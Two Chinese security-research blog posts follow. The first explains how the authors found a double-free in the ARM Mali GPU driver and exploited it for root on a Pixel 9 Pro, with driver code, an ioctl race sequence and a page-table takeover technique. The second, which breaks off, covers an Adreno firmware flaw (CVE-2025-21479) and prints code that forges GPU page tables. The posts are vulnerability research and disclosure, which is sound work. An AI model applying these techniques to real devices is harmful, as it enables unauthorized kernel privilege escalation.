京东獬豸信息安全实验室

悬挂的指针、脆弱的内存──从一个未公开的漏洞到 Pixel 9 Pro 提权

2025-12-04T11:25:55.000Z

GPU 驱动由于其与内存管理的紧密联系，已经成为近年来 Android Kernel 中一个比较有价值的攻击面，与 GPU 相关的 CVE 不算少，但是只有很少数漏洞被公开分析，安全公告中也不会谈及漏洞细节，因此每个版本的 patch 就成了分析漏洞的重要线索。

初步分析

在使用 LLM 分析 Mali GPU 驱动新版本 patch (r54p0 → r54p1) 的时候，我们在 csf/mali_kbase_csf_cpu_queue.c 文件中发现了以下变更：

 int kbasep_csf_cpu_queue_dump_print(struct kbase_context *kctx, struct kbasep_printer *kbpr)
 {
-       bool timed_out = false;
-
        mutex_lock(&kctx->csf.lock);
        if (atomic_read(&kctx->csf.cpu_queue.dump_req_status) != BASE_CSF_CPU_QUEUE_DUMP_COMPLETE) {
                kbasep_print(kbpr, "Dump request already started! (try again)\\n");
@@ -110,14 +108,10 @@ int kbasep_csf_cpu_queue_dump_print(struct kbase_context *kctx, struct kbasep_pr
        kbasep_print(kbpr, "CPU Queues table (version:v" __stringify(
                                   MALI_CSF_CPU_QUEUE_DUMP_VERSION) "):\\n");
 
-       if (WARN_ON(!wait_for_completion_timeout(&kctx->csf.cpu_queue.dump_cmp,
-                                                msecs_to_jiffies(3000)))) {
-               kbasep_print(kbpr, "Failed to wait for completion of dump request\\n");
-               timed_out = true;
-       }
+       wait_for_completion_timeout(&kctx->csf.cpu_queue.dump_cmp, msecs_to_jiffies(3000));
 
        mutex_lock(&kctx->csf.lock);
-       if (!timed_out && kctx->csf.cpu_queue.buffer) {
+       if (kctx->csf.cpu_queue.buffer) {
                WARN_ON(atomic_read(&kctx->csf.cpu_queue.dump_req_status) != BASE_CSF_CPU_QUEUE_DUMP_PENDING);
 
                /* The CPU queue dump is returned as a single formatted string */
@@ -128,7 +122,7 @@ int kbasep_csf_cpu_queue_dump_print(struct kbase_context *kctx, struct kbasep_pr
                kctx->csf.cpu_queue.buffer = NULL;
                kctx->csf.cpu_queue.buffer_size = 0;
        } else
-               kbasep_print(kbpr, "Dump error! (timed_out = %d)\\n", timed_out);
+               kbasep_print(kbpr, "Dump error! (time out)\\n");
 
        atomic_set(&kctx->csf.cpu_queue.dump_req_status, BASE_CSF_CPU_QUEUE_DUMP_COMPLETE);

看起来只是移除了一个 timeout 的条件判断，但是在查看周围代码的时候，我们发现了一个朴素的问题。还是在 csf/mali_kbase_csf_cpu_queue.c 文件，kbasep_csf_cpu_queue_dump_print 函数的上方，kbase_csf_cpu_queue_dump_buffer 函数中，对 kctx->csf.cpu_queue.buffer 调用 kfree 之后，没有立即将其置 NULL，甚至在之后的 else 分支中直接留下了这个悬挂的指针。

int kbase_csf_cpu_queue_dump_buffer(struct kbase_context *kctx, u64 buffer, size_t buf_size)
{
    size_t alloc_size = buf_size;
    char *dump_buffer;

    if (!buffer || !buf_size)
        return 0;

    if (alloc_size > KBASE_MEM_ALLOC_MAX_SIZE)
        return -EINVAL;

    alloc_size = (alloc_size + PAGE_SIZE) & ~(PAGE_SIZE - 1);
    dump_buffer = kzalloc(alloc_size, GFP_KERNEL);
    if (!dump_buffer)
        return -ENOMEM;

    WARN_ON(kctx->csf.cpu_queue.buffer != NULL);

    if (copy_from_user(dump_buffer, u64_to_user_ptr(buffer), buf_size)) {
        kfree(dump_buffer);
        return -EFAULT;
    }

    mutex_lock(&kctx->csf.lock);

    kfree(kctx->csf.cpu_queue.buffer);

    if (atomic_read(&kctx->csf.cpu_queue.dump_req_status) == BASE_CSF_CPU_QUEUE_DUMP_PENDING) {
        kctx->csf.cpu_queue.buffer = dump_buffer;
        kctx->csf.cpu_queue.buffer_size = buf_size;
        complete_all(&kctx->csf.cpu_queue.dump_cmp);
    } else
        kfree(dump_buffer);

    mutex_unlock(&kctx->csf.lock);

    return 0;
}

而且在 kfree 调用前，对 cpu_queue.buffer 的检查仅限于当其不为 NULL 时用 WARN_ON 抛出一个 warning，这直接暗示了这里有 Double Free 的可能性。

仔细检查 Double Free 的条件：

首先需要 cpu_queue.dump_req_status 为 BASE_CSF_CPU_QUEUE_DUMP_PENDING 时调用一次函数，给 cpu_queue.buffer 挂上一个指针（符合预设逻辑）
然后需要 cpu_queue.dump_req_status 不为 BASE_CSF_CPU_QUEUE_DUMP_PENDING 时连续调用函数，使 cpu_queue.buffer 在被 kfree 之后不被修改（不符合预设逻辑）

检查所有设置 cpu_queue.dump_req_status 的地方，一共有 3 处：

kbase_csf_cpu_queue_init 可以设置 BASE_CSF_CPU_QUEUE_DUMP_COMPLETE，但 cpu_queue.buffer 也会被清空
kbase_csf_cpu_queue_read_dump_req 可以设置 BASE_CSF_CPU_QUEUE_DUMP_PENDING
kbasep_csf_cpu_queue_dump_print 会设置两次 cpu_queue.dump_req_status：
- 开头会设置 BASE_CSF_CPU_QUEUE_DUMP_ISSUED
- 末尾会设置 BASE_CSF_CPU_QUEUE_DUMP_COMPLETE

再考虑 r54p1 的 patch 中所移除的 timeout 逻辑，如果在 kbasep_csf_cpu_queue_dump_print 中发生了 timeout，就可以在不重置 cpu_queue.buffer 指针的情况下设置 cpu_queue.dump_req_status 为 BASE_CSF_CPU_QUEUE_DUMP_PENDING 以外的值。

因此可行的调用顺序为：

kbasep_csf_cpu_queue_dump_print 开头设置 dump_req_status 为 ISSUED
调用 kbase_csf_cpu_queue_read_dump_req 设置 dump_req_status 为 PENDING
调用 kbase_csf_cpu_queue_dump_buffer，且 kbasep_csf_cpu_queue_dump_print 中 timeout
kbasep_csf_cpu_queue_dump_print 末尾设置 dump_req_status 为 COMPLETE

很明显这需要一个 race，检查 kbasep_csf_cpu_queue_dump_print 函数的实现可以发现两处设置 dump_req_status 的地方分别用了两次锁，而中间则是 wait_for_completion_timeout，显然在这里 race 是有希望的。

int kbasep_csf_cpu_queue_dump_print(struct kbase_context *kctx, struct kbasep_printer *kbpr)
{
    bool timed_out = false;

    mutex_lock(&kctx->csf.lock);
    if (atomic_read(&kctx->csf.cpu_queue.dump_req_status) != BASE_CSF_CPU_QUEUE_DUMP_COMPLETE) {
        kbasep_print(kbpr, "Dump request already started! (try again)\\n");
        mutex_unlock(&kctx->csf.lock);
        return -EBUSY;
    }

    atomic_set(&kctx->csf.cpu_queue.dump_req_status, BASE_CSF_CPU_QUEUE_DUMP_ISSUED);
    init_completion(&kctx->csf.cpu_queue.dump_cmp);
    kbase_event_wakeup(kctx);
    mutex_unlock(&kctx->csf.lock);

    kbasep_print(kbpr, "CPU Queues table (version:v" __stringify(MALI_CSF_CPU_QUEUE_DUMP_VERSION) "):\\n");

    if (WARN_ON(!wait_for_completion_timeout(&kctx->csf.cpu_queue.dump_cmp, msecs_to_jiffies(3000)))) {
        kbasep_print(kbpr, "Failed to wait for completion of dump request\\n");
        timed_out = true;
    }

    mutex_lock(&kctx->csf.lock);
    if (!timed_out && kctx->csf.cpu_queue.buffer) {
        WARN_ON(atomic_read(&kctx->csf.cpu_queue.dump_req_status) != BASE_CSF_CPU_QUEUE_DUMP_PENDING);

        /* The CPU queue dump is returned as a single formatted string */
        kbasep_puts(kbpr, kctx->csf.cpu_queue.buffer);
        kbasep_puts(kbpr, "\\n");

        kfree(kctx->csf.cpu_queue.buffer);
        kctx->csf.cpu_queue.buffer = NULL;
        kctx->csf.cpu_queue.buffer_size = 0;
    } else
        kbasep_print(kbpr, "Dump error! (timed_out = %d)\\n", timed_out);

    atomic_set(&kctx->csf.cpu_queue.dump_req_status, BASE_CSF_CPU_QUEUE_DUMP_COMPLETE);

    mutex_unlock(&kctx->csf.lock);
    return 0;
}

kbase_csf_cpu_queue_dump_buffer 函数本身并不会改变 cpu_queue.dump_req_status，因此只需在 kbasep_csf_cpu_queue_dump_print 函数中 race 成功，就可以随意 free cpu_queue.buffer 指针。

利用过程

首先考虑理想中的执行顺序：

kbasep_csf_cpu_queue_dump_print 被调用
kbasep_csf_cpu_queue_dump_print 中第一次设置 dump_req_status 为 ISSUED 后，调用 kbase_csf_cpu_queue_read_dump_req 设置 dump_req_status 为 PENDING
等 3s 再调用 kbase_csf_cpu_queue_dump_buffer
kbasep_csf_cpu_queue_dump_print 中 timeout
kbasep_csf_cpu_queue_dump_print 第二次设置 dump_req_status
随意调用 kbase_csf_cpu_queue_dump_buffer

需要解决的问题：

如何调用 kbasep_csf_cpu_queue_dump_print（找到 race 的入口）
如何判断 dump_req_status 被第一次设置了（确定开始 race 的时机）
如何触发 kbasep_csf_cpu_queue_dump_print 中的 timeout

探索 race 入口

首先搜索 kbasep_csf_cpu_queue_dump_print 的调用点：

kbasep_csf_cpu_queue_debugfs_show (debugfs 不可用)
kcpu_queue_timeout_worker → kcpu_fence_timeout_dump

kcpu_queue_timeout_worker 函数是 queue->timeout_work 这个 worker 的具体实现，在 fence_signal_timeout_cb 函数中被执行；

fence_signal_timeout_cb 又是 queue->fence_signal_timeout 这个 timer 的 callback，在 kcpu 处理 fence signal 时该 timer 会启动，因此有以下调用链：

ioctl(KBASE_IOCTL_KCPU_QUEUE_ENQUEUE)
-> kbasep_kcpu_queue_enqueue()
-> kbase_csf_kcpu_queue_enqueue() 
-> kbase_kcpu_fence_signal_prepare()
-> fence_signal_timeout_start() -> mod_timer(&kcpu_queue->fence_signal_timeout, ...)

fence_signal timeout
-> fence_signal_timeout_cb()
-> queue_work(..., &kcpu_queue->timeout_work);
-> kcpu_queue_timeout_worker()
-> kcpu_fence_timeout_dump()
-> kbasep_csf_cpu_queue_dump_print()

也就是说，申请一个 kcpu queue，enqueue 一个 BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL command，fence signal 超时，就可以触发 kbasep_csf_cpu_queue_dump_print 函数。

fence signal 在 kcpu_queue 中的处理分为两个阶段：

prepare 阶段，调用 kbase_kcpu_fence_signal_prepare → mod_timer 启动 timer
process 阶段，调用 kbasep_kcpu_fence_signal_process → mod_timer/del_timer_sync 刷新/结束 timer

在调用 kcpu_queue enqueue 的时候，Mali 驱动会先执行所有 command 的 prepare 阶段，再执行所有 command 的 process 阶段。虽然 kbasep_kcpu_fence_signal_process 中并没有明显的阻塞点，但是 kbase_csf_kcpu_queue_process 函数处理 command 的循环中会有一个判断，如果队列中某些 command（比如 CQS_WAIT）出错，就会终止后续 command 的处理。

void kbase_csf_kcpu_queue_process(struct kbase_kcpu_command_queue *queue, bool drain_queue)
{
    ...
    bool process_next = true;
    ...
    
    for (i = 0; i != queue->num_pending_cmds; ++i) {
        struct kbase_kcpu_command *cmd = &queue->commands[(u8)(queue->start_offset + i)];
        int status;
        
        switch (cmd->type) {
        ...
        case BASE_KCPU_COMMAND_TYPE_FENCE_SIGNAL:
            status = kbasep_kcpu_fence_signal_process(queue, &cmd->info.fence);
            KBASE_TLSTREAM_TL_KBASE_KCPUQUEUE_EXECUTE_FENCE_SIGNAL_END(kbdev, queue, status);
            break;
        case BASE_KCPU_COMMAND_TYPE_CQS_WAIT:
            status = kbase_kcpu_cqs_wait_process(kbdev, queue, &cmd->info.cqs_wait);

            if (!status && !drain_queue) {
                process_next = false;
            } else {
                cleanup_cqs_wait(queue, &cmd->info.cqs_wait);
            }

            break;
        ...
        }
        if (!process_next)
            break;
    }
    ...
}

因此只要在 fence signal 前加一个会出错的 CQS_WAIT command，就可以让其超时，从而触发 kbasep_csf_cpu_queue_dump_print 函数。

判断 race 时机

再来看第二个问题：判断 dump_req_status 被设置的时间点。

kbase_csf_cpu_queue_read_dump_req 是在 kbase_read 中被调用的，如果 dump_req_status 的旧值是 ISSUED，就会将返回给用户态 read 的 event_data 设置为 BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP。

bool kbase_csf_cpu_queue_read_dump_req(struct kbase_context *kctx, struct base_csf_notification *req)
{
    if (atomic_cmpxchg(&kctx->csf.cpu_queue.dump_req_status, BASE_CSF_CPU_QUEUE_DUMP_ISSUED,
               BASE_CSF_CPU_QUEUE_DUMP_PENDING) != BASE_CSF_CPU_QUEUE_DUMP_ISSUED) {
        return false;
    }

    req->type = BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP;
    return true;
}

因此可以在用户态持续 read，直到读到 BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP，就说明达到了进入 race 的前置条件。

Timeout and win the race

最后，kbasep_csf_cpu_queue_dump_print 函数中的 timeout 也非常容易触发，其等待的是 cpu_queue.dump_cmp 这个 completion，只会在 kbase_csf_cpu_queue_dump_buffer 函数中被 complete。

if (WARN_ON(!wait_for_completion_timeout(&kctx->csf.cpu_queue.dump_cmp, msecs_to_jiffies(3000)))) {
    kbasep_print(kbpr, "Failed to wait for completion of dump request\\n");
    timed_out = true;
}
if (atomic_read(&kctx->csf.cpu_queue.dump_req_status) == BASE_CSF_CPU_QUEUE_DUMP_PENDING) {
    kctx->csf.cpu_queue.buffer = dump_buffer;
    kctx->csf.cpu_queue.buffer_size = buf_size;
    complete_all(&kctx->csf.cpu_queue.dump_cmp);
} else
    kfree(dump_buffer);

因此，只需要进入 race 阶段后 3s 内不调用 kbase_csf_cpu_queue_dump_buffer 就可以触发 timeout，但是要在超时后立即调用 kbase_csf_cpu_queue_dump_buffer，否则等到 dump_req_status 被设置为 COMPLETE 后就无法及时给 cpu_queue.buffer 挂上 kmalloc 指针了。

Page UAF → Get root

最终可以构造以下调用：

ioctl(KBASE_IOCTL_KCPU_QUEUE_ENQUEUE) with CQS_WAIT
ioctl(KBASE_IOCTL_KCPU_QUEUE_ENQUEUE) with FENCE_SIGNAL
wait for fence_signal timeout
read until BASE_CSF_NOTIFICATION_CPU_QUEUE_DUMP
wait for queue_dump_print timeout
ioctl(KBASE_IOCTL_CS_CPU_QUEUE_DUMP) immediately

如果 race 成功，接下来调用 ioctl(KBASE_IOCTL_CS_CPU_QUEUE_DUMP) 就可以重复 kfree 同一个 kmalloc 指针了。

但是 Mali 驱动中并没有提供直接操作 cpu_queue.buffer 的接口，单纯地多次 free 除了把系统搞崩并没有其他影响，因此考虑寻找其他可控的 gadget，在第一次 free 后把 page 再分配走，从而将 Double Free 转化为可利用的 UAF。

现在可以检查一下这个 kmalloc 指针的品相：

int kbase_csf_cpu_queue_dump_buffer(struct kbase_context *kctx, u64 buffer, size_t buf_size)
{
    size_t alloc_size = buf_size;
    char *dump_buffer;
    
    if (alloc_size > KBASE_MEM_ALLOC_MAX_SIZE) // 0x200000
        return -EINVAL;

    alloc_size = (alloc_size + PAGE_SIZE) & ~(PAGE_SIZE - 1);
    dump_buffer = kzalloc(alloc_size, GFP_KERNEL);
    if (!dump_buffer)
        return -ENOMEM;
    ...
}

从 kbase_csf_cpu_queue_dump_buffer 函数中可以看出，alloc size 是页对齐的，所以能用的 gadget 还是比较有限的，小一些的 slab gadget 诸如 signalfd、seq_operations 等都比较难用（需要让大 slab 的 page 被回收再被小 slab 拿走，很不稳定）。

所幸 dump_buffer 中对 alloc_size 的要求并不算严格，最大可以达到 0x200000。翻一下 kmalloc 的源码可以发现，当请求的 size 大于最大 slab 的 size 时，就会通过 kmalloc_large 直接用 alloc_pages 从 buddy allocator 拿 page。对应 kfree 的时候，会识别到指针所指向的 page 不属于 slab 而直接用 __free_pages 将 page 归还到 buddy allocator。

此时可以自然地想到 Mali 作为 GPU 驱动所提供的直接处理内存的能力，而且从 Mali 拿到的内存可以被直接映射到用户态，非常好用。Mali 的 mem pool allocator 会在 mem pool 中的 page 不足时直接从 buddy allocator 拿 page，只要一次性申请大量的 GPU 内存，就可以拿到刚 kfree 到 buddy allocator 的 page。

或许会想到，用户态 mmap 匿名页也可以从 buddy allocator 拿 page，为什么要再去从 GPU 拿呢？实际上 buddy allocator 内的 page 有一定程度的隔离，除了最基础的按照不同的 order 分组（较易流通），还会按照不同的 migrate type 分组（很难流通）。通过 mmap 匿名页拿到的 page 的 migrate type 是 Movable，通过 kmalloc_large 拿到的 page 是 Unmovable 的，通过 mmap 匿名页很难拿到被 kfree 释放的 page，而从 GPU 拿到的 page 也是 Unmovable 的，可以很容易地实现与 kmalloc 之间的 page 互通。当然还有许多其他方法，这里就不深入讨论了。

此时再触发一次 kfree，就可以拿到可读写的已回收 page，接下来要做的就简单了，mmap 大量内存，使 UAF 的 page 被分配为页表，然后通过改写页表就可以做到任意物理地址读写（可以通过 GPU 内存 mmap 到用户态的 buffer 直接读写页表而无需其他介质），之后的利用就如履平地了。

在实际利用的过程中，我们尝试将 mmap 的地址按 2M 对齐，发现在申请的 GPU 内存中，只有一个 page 被重新分配为一张二级页表，其他的既没有变成三级页表，也没有变成普通的数据页。这是因为 Mali 的 mem pool allocator 在向 buddy allocator 拿 page 的时候，是一张一张申请的，从而把原本 buddy allocator 中的复合 page 打碎了。此时 kfree 会将指针对应的 page 当作单一 page 处理，最终只有一个 page 被再次回收。对于二级页表，只需将其页表项低位的描述符改为 block，就可以当作 huge page 的末级页表来使用。

最终我们在一台 Pixel 9 Pro（安全更新版本为 2025 年 11 月）上拿到了 root（在其他相关机型上也理论可行）。在开启 kernel MTE 的情况下，仍然可以利用成功并拿到 root 权限，但是在 kernel 的日志中可以看到 kasan 的 UAF warning。

漏洞历史

这个漏洞在 r53p0 版本被引入，为 kbasep_csf_cpu_queue_dump_print 函数添加的 timeout 让 kbase_csf_cpu_queue_dump_buffer 中 cpu_queue.buffer 指针的悬挂成为可能。

diff --git a/driver-r52p0/drivers/gpu/arm/midgard/csf/mali_kbase_csf_cpu_queue.c b/driver-r53p0/drivers/gpu/arm/midgard/csf/mali_kbase_csf_cpu_queue.c
index 087cdb4..2a1bdaa 100644
--- a/driver-r52p0/drivers/gpu/arm/midgard/csf/mali_kbase_csf_cpu_queue.c
+++ b/driver-r53p0/drivers/gpu/arm/midgard/csf/mali_kbase_csf_cpu_queue.c
@@ -1,7 +1,7 @@
 // SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note
 /*
  *
- * (C) COPYRIGHT 2023 ARM Limited. All rights reserved.
+ * (C) COPYRIGHT 2023-2024 ARM Limited. All rights reserved.
  *
  * This program is free software and is provided to you under the terms of the
  * GNU General Public License version 2 as published by the Free Software
@@ -93,6 +93,8 @@ int kbase_csf_cpu_queue_dump_buffer(struct kbase_context *kctx, u64 buffer, size
 
 int kbasep_csf_cpu_queue_dump_print(struct kbase_context *kctx, struct kbasep_printer *kbpr)
 {
+       bool timed_out = false;
+
        mutex_lock(&kctx->csf.lock);
        if (atomic_read(&kctx->csf.cpu_queue.dump_req_status) != BASE_CSF_CPU_QUEUE_DUMP_COMPLETE) {
                kbasep_print(kbpr, "Dump request already started! (try again)\\n");
@@ -108,10 +110,14 @@ int kbasep_csf_cpu_queue_dump_print(struct kbase_context *kctx, struct kbasep_pr
        kbasep_print(kbpr, "CPU Queues table (version:v" __stringify(
                                   MALI_CSF_CPU_QUEUE_DUMP_VERSION) "):\\n");
 
-       wait_for_completion_timeout(&kctx->csf.cpu_queue.dump_cmp, msecs_to_jiffies(3000));
+       if (WARN_ON(!wait_for_completion_timeout(&kctx->csf.cpu_queue.dump_cmp,
+                                                msecs_to_jiffies(3000)))) {
+               kbasep_print(kbpr, "Failed to wait for completion of dump request\\n");
+               timed_out = true;
+       }
 
        mutex_lock(&kctx->csf.lock);
-       if (kctx->csf.cpu_queue.buffer) {
+       if (!timed_out && kctx->csf.cpu_queue.buffer) {
                WARN_ON(atomic_read(&kctx->csf.cpu_queue.dump_req_status) != BASE_CSF_CPU_QUEUE_DUMP_PENDING);
 
                /* The CPU queue dump is returned as a single formatted string */
@@ -122,7 +128,7 @@ int kbasep_csf_cpu_queue_dump_print(struct kbase_context *kctx, struct kbasep_pr
                kctx->csf.cpu_queue.buffer = NULL;
                kctx->csf.cpu_queue.buffer_size = 0;
        } else
-               kbasep_print(kbpr, "Dump error! (time out)\\n");
+               kbasep_print(kbpr, "Dump error! (timed_out = %d)\\n", timed_out);
 
        atomic_set(&kctx->csf.cpu_queue.dump_req_status, BASE_CSF_CPU_QUEUE_DUMP_COMPLETE);

不过在 r54p1 版本的“修复”中，并没有直接解决 kbase_csf_cpu_queue_dump_buffer 中的指针悬挂，而是简单的回退了 kbasep_csf_cpu_queue_dump_print 中的 timeout，也许这个漏洞在之后的某个版本还会“死灰复燃”。

diff --git a/driver-r54p0/drivers/gpu/arm/midgard/csf/mali_kbase_csf_cpu_queue.c b/driver-r54p1/drivers/gpu/arm/midgard/csf/mali_kbase_csf_cpu_queue.c
index 2a1bdaa..087cdb4 100644
--- a/driver-r54p0/drivers/gpu/arm/midgard/csf/mali_kbase_csf_cpu_queue.c
+++ b/driver-r54p1/drivers/gpu/arm/midgard/csf/mali_kbase_csf_cpu_queue.c
@@ -1,7 +1,7 @@
 // SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note
 /*
  *
- * (C) COPYRIGHT 2023-2024 ARM Limited. All rights reserved.
+ * (C) COPYRIGHT 2023 ARM Limited. All rights reserved.
  *
  * This program is free software and is provided to you under the terms of the
  * GNU General Public License version 2 as published by the Free Software
@@ -93,8 +93,6 @@ int kbase_csf_cpu_queue_dump_buffer(struct kbase_context *kctx, u64 buffer, size
 
 int kbasep_csf_cpu_queue_dump_print(struct kbase_context *kctx, struct kbasep_printer *kbpr)
 {
-       bool timed_out = false;
-
        mutex_lock(&kctx->csf.lock);
        if (atomic_read(&kctx->csf.cpu_queue.dump_req_status) != BASE_CSF_CPU_QUEUE_DUMP_COMPLETE) {
                kbasep_print(kbpr, "Dump request already started! (try again)\\n");
@@ -110,14 +108,10 @@ int kbasep_csf_cpu_queue_dump_print(struct kbase_context *kctx, struct kbasep_pr
        kbasep_print(kbpr, "CPU Queues table (version:v" __stringify(
                                   MALI_CSF_CPU_QUEUE_DUMP_VERSION) "):\\n");
 
-       if (WARN_ON(!wait_for_completion_timeout(&kctx->csf.cpu_queue.dump_cmp,
-                                                msecs_to_jiffies(3000)))) {
-               kbasep_print(kbpr, "Failed to wait for completion of dump request\\n");
-               timed_out = true;
-       }
+       wait_for_completion_timeout(&kctx->csf.cpu_queue.dump_cmp, msecs_to_jiffies(3000));
 
        mutex_lock(&kctx->csf.lock);
-       if (!timed_out && kctx->csf.cpu_queue.buffer) {
+       if (kctx->csf.cpu_queue.buffer) {
                WARN_ON(atomic_read(&kctx->csf.cpu_queue.dump_req_status) != BASE_CSF_CPU_QUEUE_DUMP_PENDING);
 
                /* The CPU queue dump is returned as a single formatted string */
@@ -128,7 +122,7 @@ int kbasep_csf_cpu_queue_dump_print(struct kbase_context *kctx, struct kbasep_pr
                kctx->csf.cpu_queue.buffer = NULL;
                kctx->csf.cpu_queue.buffer_size = 0;
        } else
-               kbasep_print(kbpr, "Dump error! (timed_out = %d)\\n", timed_out);
+               kbasep_print(kbpr, "Dump error! (time out)\\n");
 
        atomic_set(&kctx->csf.cpu_queue.dump_req_status, BASE_CSF_CPU_QUEUE_DUMP_COMPLETE);

ARM 在 12 月的安全公告中披露了三个 CVE：

A local non-privileged user process can perform improper GPU processing operations to expose sensitive data. This issue has been assigned the identifier CVE-2025-2879.
A local non-privileged user process can perform improper GPU memory processing operations to gain access to already freed memory. This issue has been assigned the identifier CVE-2025-6349.
A local non-privileged user process can perform improper GPU processing operations to gain access to already freed memory. This issue has been assigned the identifier CVE-2025-8045.

影响范围分别为：

CVE-2025-2879: All versions from r29p0-r49p4, r50p0-r54p0
CVE-2025-6349: All versions from r53p0-r54p1
CVE-2025-8045: All versions from r53p0-r54p1

虽然没有漏洞细节，但从受影响的版本来看，本文所分析的漏洞可能已被认定为 CVE-2025-6349 或 CVE-2025-8045。

总结

本文介绍了一次从 patch 分析未公开漏洞并最终完成提权利用的过程。尽管漏洞细节未被公开，但从 patch 文件中仍可以发现一些蛛丝马迹，这其中很有可能暗藏通向提权等利用的路径，而且供应链上下游之间安全补丁传递的延迟也为漏洞的在野利用提供了不小的风险窗口。

本文所分析的漏洞仅表现为一处悬挂指针，在正常流程下会被直接覆盖掉而不会有任何影响，但是在攻击者的视角下，任何“不完美”的代码都有可能被利用。通过对输入进行构造，这个悬挂的指针被引申到内存页的 UAF 中，并最终导致了权限提升。或许开发人员意识到了悬挂的指针可能会被滥用，但是一句简单的 WARN_ON 并不能在生产环境中阻止恶意程序的攻击，甚至无法让用户感知到风险的存在。

从移动端 GPU 安全的视角出发，GPU 与 kernel 内存管理的紧密联系暴露了一个非常大的攻击面，不仅体现在其漏洞会直接影响内存，也有为漏洞利用提供优良 Gadget 的风险。用户态程序通过 GPU 驱动可以非常方便的直接操作内存页，包括内存页的申请/回收/读写，这也可能会为源自其他地方（GPU 以外）的漏洞的利用提供便利，“短板效应”在安全领域尤为明显。未来 GPU 安全的发展如何，也值得我们去持续关注。

References

https://developer.arm.com/documentation/110697/1-0/?lang=en

https://source.android.com/docs/security/bulletin/2025-12-01?hl=zh-cn#Arm-components

漫步安卓物理内存：CVE-2025-21479 提权实录

2025-08-21T03:45:14.000Z

背景

在大多数用户的印象里，GPU（图形处理器）是游戏流畅、视频绚丽的保障，是沉浸在虚拟世界背后的无名英雄。然而，在现代移动计算架构，尤其是在安卓生态中，GPU的角色早已超越了“图形画师”的范畴。它通过诸如OpenCL、Vulkan等通用计算框架，深度参与到机器学习、图像处理、甚至安全计算等关键任务中，成为了SoC（系统级芯片）中与CPU平起平坐的“第二颗大脑”。

正是这种权限与复杂性的与日俱增，使其成为了安全攻防的新前线。传统的安全模型高度聚焦于加固CPU和操作系统内核，却往往忽视了GPU这个拥有独立驱动、固件（Firmware）和强大DMA（直接内存访问）能力的“特权邻居”。一旦这个邻居的“家门”被撬开，攻击者获得的将是一个绕过所有主流内核防护机制的绝佳跳板。

近年来，GPU安全漏洞呈现显著上升趋势。正如Google Project Zero在2022年的博客中提到的那样：

There were 7 Android in-the-wild 0-days detected and disclosed this year. Prior to 2021 there had only been 1 and it was in 2019: CVE-2019-2215.
For the 7 Android 0-days they targeted the following components:
Qualcomm Adreno GPU driver (CVE-2020-11261, CVE-2021-1905, CVE-2021-1906)
ARM Mali GPU driver (CVE-2021-28663, CVE-2021-28664
Upstream Linux kernel (CVE-2021-1048, CVE-2021-0920)
5 of the 7 0-days from 2021 targeted GPU drivers.

在2022年的7个在野0day中，有5个是关于GPU漏洞的，比例高达70%。且GPU漏洞的危害性往往极高，正如我们将要深入剖析的CVE-2025-21479一样，一旦被利用将引发从用户态直通物理内存操作的本地权限提升。

这个存在于高通Adreno GPU固件中的逻辑缺陷，正是一个典型的“核弹级”案例。它允许攻击者实现任意物理地址的读写操作。这意味着，攻击者不再需要与复杂的软件 mitigations（如KASLR、DEP、CFI）缠斗，而是直接“改写物理内存”。接下来，让我们一起揭开这场“上帝模式”漏洞的利用之旅。

Catch the bug from diff

高通的6月bulletin 为我们带来了3个漏洞：CVE-2025-21479，CVE-2025-21480，CVE-2025-27038。但可惜没有一个注明了commit修复链接，这给漏洞研究带来了挑战。但没多久，就有一名大佬 zhuowei 在 github 公开了他的漏洞poc和分析过程。

zhuowei 在文中提到，他通过Freedreno的 afuc 反汇编器逆向了三星S24的前后两个版本的GPU固件，并发现了一些端倪：

1
2
3

Galaxy S24 firmware: gen70900_sqe.fw
April update (S921USQU4BYD9): v675
May update (S921USQS4BYE4): v676

这两个固件仅有一处差异，即每次使用寄存器 $12 时，mask 从 0x3（0b11）变成 0x7（0b111），多了1个bit，而这个$12代表着IB level。

        0163: b80300a4  CP_ME_INIT:
        0163: b80300a4  fxn355:
        0163: b80300a4  cread $03, [$00 + 0x0a4]
-       0164: 2a440003  and $04, $12, 0x3
+       0164: 2a440007  and $04, $12, 0x7
        0165: 98641813  ushr $03, $03, $04
        0166: c860004a  brne $03, b0, #l432
        0167: 01000000  nop

自高通Adreno A7xx系列GPU起，其硬件引入了一个新的指令缓冲区（IB）层级，将原有的四级架构（RB、IB1、IB2、SDS）扩展为五级（RB、IB1、IB2、IB3、SDS）。关键问题在于，用于权限检查的微码逻辑未随之更新。微码通过 当前层级值 AND 3 的位运算来判定当前所处级别，若结果为0（即RB级），则允许执行特权指令。

在未打补丁的A7xx硬件上，当于第4级SDS执行指令时，计算 4 AND 3 得到结果0。这导致微码产生致命误判，错误地认为当前处于最高权限的RB级别，从而违规批准了特权指令的执行。

利用过程始于对 CP_SET_DRAW_STATE 指令的调用。此指令能让用户态应用在SDS层级上提交并执行命令序列。由于CVE-2025-21479漏洞的存在，当这个由用户控制的命令序列在SDS层级被执行时，GPU微码会错误地授予其RB层级的最高特权。攻击者可以滥用 CP_SMMU_TABLE_UPDATE 特权指令修改TTBR0寄存器对GPU的一级页表进行重配置。通过植入一个精心构造的恶意页表，攻击者可以完全掌控GPU对系统物理地址空间的映射关系。从而GPU沦为攻击者向任意物理内存地址发起读写攻击的武器，为后续获取内核权限奠定了决定性基础。

构建内核物理地址读写原语

成功利用 CP_SMMU_TABLE_UPDATE 获得配置页表的能力后，攻击的下一个阶段是构建一个稳定可靠的内核物理地址读写原语。其核心在于构造并定位一个受控的页表，并利用GPU指令实现任意物理内存的访问。

为TTBR0构建受控页表

攻击的首要步骤是准备一个恶意的一级页表，并将其物理地址配置到TTBR0寄存器中。该页表将负责定义GPU的虚拟地址到物理地址的映射关系。

内核物理地址读写的第一步，是构造出GPU的TTBR0页表，其中0x1234567841414141处就是TTBR0一级页表的物理地址：

// 构造用于执行 CP_SMMU_TABLE_UPDATE 的指令序列
*drawstate_cmds++ = cp_type7_packet(CP_SMMU_TABLE_UPDATE, 4);
drawstate_cmds += cp_gpuaddr(drawstate_cmds, 0x1234567841414141); // 目标TTBR0页表物理地址 (P)
*drawstate_cmds++ = 0x42424242; // 参数1
*drawstate_cmds++ = 0x43434343; // 参数2
drawstate_cmds += cp_wait_for_me(drawstate_cmds);
drawstate_cmds += cp_wait_for_idle(drawstate_cmds);

